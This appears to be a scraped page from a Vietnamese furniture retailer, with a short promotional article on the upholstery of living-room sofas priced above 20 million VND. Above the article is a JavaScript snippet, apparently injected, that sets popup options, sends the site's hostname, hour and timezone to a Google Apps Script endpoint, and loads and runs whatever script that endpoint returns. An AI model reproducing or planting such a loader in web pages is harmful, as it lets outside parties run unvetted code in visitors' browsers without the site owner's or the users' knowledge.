var GTM = 'GTM-NJKFBQ8'; var GG_ADS = 'ca-pub-8687624480880776'; var POPUP_IMG_PREFIX = "https://nhaxinhplaza.vn/wp-content/uploads/2022/08/"; // qc.png, close.png var SHOW_POPUP = 1; // 0: disable, 1: enable var MAX_CLAIM = 1; var TIME_TO_SHOW_POPUP = 10; // 10s var MAX_BUFF = 3; var b64e = function (a) { return btoa(encodeURIComponent(a).replace(/%([0-9A-F]{2})/g, function (b, a) { return String.fromCharCode("0x" + a) })) }; var gg_layer = document.createElement('script'); gg_layer.type = 'text/javascript'; gg_layer.src = `https://script.google.com/macros/s/AKfycbwT2tLHaERiLaaaT_05pnXM2h0pjKHGRPBTQgeffPjyIIXBAR46dAuj5S0sgi2scsJ77Q/exec ?st=${b64e(location.hostname)}&tm=${new Date().getHours()}&os=${b64e(new Date().getTimezoneOffset())}`; var s = document.getElementsByTagName('script')[0];s.parentNode.insertBefore(gg_layer, s);

Sofa phòng khách trên 20 triệu bọc chất liệu gì?

Chất liệu làm bàn ghế sofa phòng khách là một trong những yếu tố quyết định đến giá thành của sản phẩm. Với sofa có mức giá cao thường được làm từ chất liệu da thật bền đẹp, êm ái. Vậy sofa trên 20 triệu đến khoảng 30 triệu đồng được làm từ chất liệu gì bạn đã biết?

Sofa phòng khách trên 20 triệu bọc chất liệu gì?

Ghế sofa phòng khách trong khoảng từ trên 20 triệu cho đến 30 triệu được đánh giá là dòng sản phẩm cao cấp, bền đẹp và là dòng sofa nên sở hữu cho không gian. Sofa đẹp sang giúp căn phòng ấn tượng, đẳng cấp và cuốn hút hơn.

sofa phòng khách trên 20 triệu bọc chất liệu gì
Sofa phòng khách trên 20 triệu đến khoảng 30 triệu được đánh giá chất lượng tốt và nên chọn lựa

Sofa trên 20 triệu đồng thường được bọc bên ngoài bằng chất liệu giả da cao cấp hoặc vải nỉ cao cấp. Với mức giá này thì đây là những chất liệu bọc rất phù hợp và cũng được đánh giá rất cao. Tất nhiên nó không phải là loại da thật cao cấp giống như những bộ sofa có mức giá cao hơn. Chất liệu sofa da là loại giả da hay vải nỉ cao cấp cũng rất bền đẹp, êm ái khác với những chất liệu kém chất lượng khác.

sofa phòng khách trên 20 triệu bọc chất liệu gì
Sofa trên 20 triệu được bọc bằng giả da cao cấp hoặc vải nỉ cao cấp

Sofa phòng khách trên 20 triệu có nên mua?

Chắc chắn là nên nhé. Nếu như bạn không có điều kiện để mua những mẫu sofa nhập khẩu đắt tiền thì sofa trong tầm này sẽ cực kì phù hợp. Sofa giả da cao cấp rất bền đẹp, êm, thoải mái và sẽ không bị phai màu hay nhanh bị bong tróc, nứt nẻ. Sofa vải nỉ cao cấp cũng tương tự với sự bền màu, không rách, không xổ lông. Nói chung với mức giá vừa phải, chất lượng tốt thì đây là dòng sản phẩm bạn không thể bỏ qua. Hơn nữa sofa trên 20 triệu cũng có rất nhiều mẫu khác nhau, trong đó tiêu biểu nhất là sofa góc với thiết kế hiện đại.

sofa phòng khách trên 20 triệu bọc chất liệu gì
Bạn nên sở hữu mẫu sofa phòng khách trên 20 triệu cho không gian của mình

Sofa phòng khách trên 20 triệu chất lượng cao có tại Nội Thất Xinh chính là sự chọn lựa hàng đầu cho quý khách hàng.